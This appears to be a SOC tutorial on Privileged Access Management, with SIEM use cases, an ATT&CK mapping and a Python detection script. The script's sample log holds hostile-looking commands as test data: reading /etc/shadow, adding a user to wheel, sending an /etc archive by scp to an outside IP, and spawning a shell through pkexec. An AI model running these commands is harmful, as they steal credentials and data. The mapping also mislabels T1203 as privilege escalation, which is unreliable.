Utilizing “Privileged Access Management” for Enhanced Security: Use Cases for SOC Teams #part 5

Privileged Access Management (PAM) is a critical aspect of information security that focuses on controlling, managing, and monitoring the access and activities of privileged users within an IT environment. Privileged users include administrators, superusers, and accounts with elevated rights that allow them to perform sensitive tasks, such as configuring system settings, managing network devices, modifying user accounts, and accessing confidential information.

Key Aspects of Privileged Access Management include:

  1. Access Control: PAM ensures that only authorized users have access to critical systems and resources by managing privileges through policies and rules. This involves defining what each privileged account can do, with which devices, and under what circumstances.
  2. Credential Management: Managing and securing the credentials for privileged accounts to prevent unauthorized access. This often involves using a centralized repository that can encrypt and store passwords, and possibly integrating with technologies like multi-factor authentication.
  3. Session Management: Monitoring and recording sessions for all privileged account activities. This provides an audit trail that can be invaluable for forensic analysis following a security incident and for ongoing compliance with internal and regulatory requirements.
  4. Least Privilege Enforcement: Ensuring that users are granted only the minimum level of access necessary to perform their job functions. This minimizes the risk and impact of a privileged account being misused or compromised.
  5. Audit and Compliance: Keeping detailed logs of all privileged access and activities to meet compliance requirements for various regulatory frameworks. PAM tools often offer features to help automatically generate reports and conduct audits.
  6. Threat Detection and Response: Analyzing data from privileged sessions to identify suspicious activities or potential breaches, enabling rapid response to mitigate threats.

Log Parameters:

  1. User ID: Identifies the account used to perform privileged operations.
  2. Action: Specifies the type of privileged activity performed, e.g., login, command execution, file access.
  3. Timestamp: Records the exact time when the action was performed.
  4. Result: Indicates whether the privileged action was successful or failed.
  5. Session ID: A unique identifier for the session during which the privileged actions were performed.
  6. Source IP: The IP address from which the privileged access was initiated.
  7. Destination IP: The IP address of the system where privileged operations were performed.
  8. Command Executed: Details the specific commands that were run during a session.
  9. Elevation Method: Specifies how privileges were escalated, if applicable.

Use Cases for SIEM:

Unusual After-Hours Privileged Access

  • Objective: To detect potential unauthorized or suspicious privileged access during non-business hours, which could indicate insider threats or compromised accounts.
  • Method: Configure SIEM to alert when privileged actions are logged with a timestamp outside of standard operational hours, especially if they involve critical systems or high-risk operations.

Excessive Privileged Command Use

  • Objective: To identify potential abuse or misuse of privileges by detecting an unusually high number of privileged commands executed within a short timeframe.
  • Method: Set a threshold for the acceptable number of privileged commands per session or per hour. Use SIEM to monitor and alert when this threshold is exceeded, indicating possible malicious activity or policy violation.

Geographically Improbable Access

  • Objective: To spot potential credential compromise or unauthorized access by detecting privileged access from locations inconsistent with the user’s normal patterns.
  • Method: Integrate geographic IP location data into SIEM. Alert if privileged access is initiated from IPs located in unusual or high-risk geographical locations, especially if rapid successive logins occur from geographically distant locations.

Failed Privileged Access Attempts

  • Objective: To monitor and respond to multiple failed attempts to use privileged accounts, as this may indicate a brute force or password spraying attack.
  • Method: Use SIEM to track and alert on multiple failed privileged access attempts within a defined timeframe (e.g., 10 minutes), especially if the failures come from different source IPs or multiple user IDs.

Privilege Escalation Monitoring

  • Objective: To detect unauthorized privilege escalations, which can be a critical step in an attack chain.
  • Method: Monitor for any changes in the elevation method parameter, and alert if an uncommon method or an unusually high frequency of privilege escalation is detected.
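The log parameters listed earlier and the five SIEM use cases above are enough to build working correlation rules. The following added example (not code from the original article, and not any specific PAM or SIEM product's API) parses constructed sample records carrying those nine fields and implements one detection per use case: after-hours access, command-count thresholds per session, improbable travel between successive logins, bursts of failed privileged logins within a 10-minute window, and elevation methods outside a baseline. The business hours, thresholds, travel speed limit, and the IP-to-coordinate table are all assumptions chosen for the sample data; a real deployment would take them from the organisation's own baselines and a GeoIP feed.

```python
"""Toy SIEM-style correlation rules over PAM session logs (added example)."""
import csv
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from math import asin, cos, radians, sin, sqrt

# Constructed sample PAM records, one CSV row each, using the log parameters above:
# user_id,action,timestamp,result,session_id,src_ip,dst_ip,command,elevation_method
SAMPLE_LOG = """\
alice,login,2024-03-04T09:02:11,success,S1,10.0.1.5,10.0.9.2,,sudo
alice,command,2024-03-04T09:03:00,success,S1,10.0.1.5,10.0.9.2,systemctl restart nginx,sudo
bob,login,2024-03-04T02:14:40,success,S2,10.0.1.8,10.0.9.3,,sudo
bob,command,2024-03-04T02:15:02,success,S2,10.0.1.8,10.0.9.3,useradd svc-tmp,sudo
bob,command,2024-03-04T02:15:10,success,S2,10.0.1.8,10.0.9.3,usermod -aG wheel svc-tmp,sudo
bob,command,2024-03-04T02:15:20,success,S2,10.0.1.8,10.0.9.3,cat /etc/shadow,sudo
bob,command,2024-03-04T02:15:31,success,S2,10.0.1.8,10.0.9.3,tar czf /tmp/x.tgz /etc,sudo
bob,command,2024-03-04T02:15:44,success,S2,10.0.1.8,10.0.9.3,scp /tmp/x.tgz 198.51.100.9:/,sudo
carol,login,2024-03-04T10:00:00,failed,S3,203.0.113.7,10.0.9.2,,
carol,login,2024-03-04T10:01:00,failed,S4,203.0.113.8,10.0.9.2,,
carol,login,2024-03-04T10:02:30,failed,S5,203.0.113.9,10.0.9.2,,
dave,login,2024-03-04T11:00:00,success,S6,10.0.1.9,10.0.9.4,,sudo
dave,login,2024-03-04T11:30:00,success,S7,198.51.100.20,10.0.9.4,,sudo
erin,command,2024-03-04T14:05:00,success,S8,10.0.1.12,10.0.9.5,pkexec /bin/sh,pkexec
"""

# Constructed (latitude, longitude) table standing in for a GeoIP feed: assumption.
GEO = {"10.0.1.9": (52.52, 13.40), "198.51.100.20": (-33.87, 151.21)}
BASELINE_ELEVATION = frozenset({"sudo"})  # assumed approved elevation methods


@dataclass
class Record:
    user_id: str
    action: str
    ts: datetime
    result: str
    session_id: str
    src_ip: str
    dst_ip: str
    command: str
    elevation: str


def parse_log(text):
    """Turn the CSV records into Record objects with a real datetime."""
    rows = csv.reader(line for line in text.splitlines() if line.strip())
    return [Record(u, a, datetime.fromisoformat(t), res, sid, src, dst, cmd, elev)
            for u, a, t, res, sid, src, dst, cmd, elev in rows]


def after_hours_access(records, start_hour=8, end_hour=18):
    """Use case 1: successful privileged activity outside assumed business hours."""
    return sorted({(r.user_id, r.session_id) for r in records
                   if r.result == "success" and not start_hour <= r.ts.hour < end_hour})


def excessive_commands(records, threshold=4):
    """Use case 2: sessions with more than `threshold` privileged commands."""
    counts = defaultdict(int)
    for r in records:
        if r.action == "command":
            counts[(r.user_id, r.session_id)] += 1
    return {k: n for k, n in counts.items() if n > threshold}


def _km(a, b):
    """Great-circle (haversine) distance in km between two (lat, lon) points."""
    lat1, lon1, lat2, lon2 = map(radians, (*a, *b))
    h = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371 * asin(sqrt(h))


def improbable_travel(records, geo=GEO, max_kmh=900.0):
    """Use case 3: consecutive logins by one user that imply travel faster than max_kmh."""
    by_user = defaultdict(list)
    for r in records:
        if r.action == "login" and r.result == "success" and r.src_ip in geo:
            by_user[r.user_id].append(r)
    hits = []
    for user, logins in by_user.items():
        logins.sort(key=lambda r: r.ts)
        for prev, cur in zip(logins, logins[1:]):
            hours = (cur.ts - prev.ts).total_seconds() / 3600
            km = _km(geo[prev.src_ip], geo[cur.src_ip])
            if km > 0 and (hours == 0 or km / hours > max_kmh):
                hits.append((user, prev.src_ip, cur.src_ip, round(km)))
    return hits


def failed_privileged_logins(records, window=timedelta(minutes=10), threshold=3):
    """Use case 4: per user, `threshold` or more failed logins inside a sliding window.
    Returns {user: (failures_in_burst, distinct_source_ips)}."""
    by_user = defaultdict(list)
    for r in records:
        if r.action == "login" and r.result == "failed":
            by_user[r.user_id].append(r)
    hits = {}
    for user, fails in by_user.items():
        fails.sort(key=lambda r: r.ts)
        for i, first in enumerate(fails):
            burst = [f for f in fails[i:] if f.ts - first.ts <= window]
            if len(burst) >= threshold:
                hits[user] = (len(burst), len({f.src_ip for f in burst}))
                break
    return hits


def escalation_anomalies(records, baseline=BASELINE_ELEVATION, max_per_user=10):
    """Use case 5: elevation methods outside the baseline, and users escalating too often."""
    uncommon = sorted({(r.user_id, r.elevation) for r in records
                       if r.elevation and r.elevation not in baseline})
    counts = defaultdict(int)
    for r in records:
        if r.elevation:
            counts[r.user_id] += 1
    return uncommon, {u: n for u, n in counts.items() if n > max_per_user}


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print("after hours:", after_hours_access(recs))
    print("excessive commands:", excessive_commands(recs))
    print("improbable travel:", improbable_travel(recs))
    print("failed logins:", failed_privileged_logins(recs))
    print("escalation anomalies:", escalation_anomalies(recs))
```

Each rule returns the entities it flagged (user, session, or source IPs) rather than printing, so the same functions can feed an alert queue or a case record with the Session ID preserved for pulling the recorded session. Keeping the thresholds as parameters matters in practice: the after-hours window, command-rate ceiling and travel-speed limit are the parts a SOC tunes per environment, and each of them is an assumption here.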

MITRE ATT&CK mapping:

T1078: Valid Accounts. Adversaries may use valid accounts to access systems and perform tasks using privileged commands, appearing as legitimate users.

T1203 / T1068: Exploitation for Privilege Escalation. This technique involves exploiting software vulnerabilities to gain higher-level permissions. Frequent use of privilege escalation commands might indicate an ongoing attack.

T1059: Command and Scripting Interpreter. Attackers often use command-line interpreters to execute commands, scripts, or binary executables. Monitoring for excessive usage can help detect unauthorized actions or lateral movement.